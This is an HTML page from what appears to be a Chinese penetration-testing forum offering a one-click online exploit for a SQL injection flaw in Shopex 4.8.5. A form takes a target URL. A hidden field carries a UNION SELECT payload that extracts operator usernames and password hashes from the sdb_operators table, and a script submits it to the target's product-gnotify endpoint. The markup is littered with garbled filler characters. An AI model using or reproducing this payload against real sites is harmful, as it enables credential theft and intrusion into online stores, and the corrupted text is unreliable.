<center>) Z- x, b# |$ T0 G1 A+ s
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
8 ^' ^- Y6 c; n<form action="" method="post" name="submit_url">9 |1 ?" ~* R5 b+ C" R
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
0 c7 Y8 f8 h, F G1 C! `( B2 E<input type="hidden" name="goods[goods_id]" value="3">$ L2 q! g4 Y8 M6 h, C) g* D
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">5 F' Y6 ~4 j' u q3 C( f
<input type="submit" value="给我注入" onclick=fsubmit()>
5 m2 C8 w) @) [) m' T+ m) i3 \</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com# b+ ?& L( ?5 q
3 Q! U' T9 v4 s, S! ], Y<script> + ?1 H" N$ E6 Q5 y5 i
function fsubmit(){ . n: t/ i( m' c. M6 B; T( ]: J# o
form = document.forms[0];
: n8 q7 G9 p1 D- Fform.action = form.url.value+'/?product-gnotify'; 2 |. W: ?5 [2 p; ~6 T
form.submit(); 3 d$ Z+ A* R. Y {" W5 Y
}
, A) `; _0 U% Z- j" l9 X</script>0 [3 X: _4 c; ^% C7 u' r9 n
|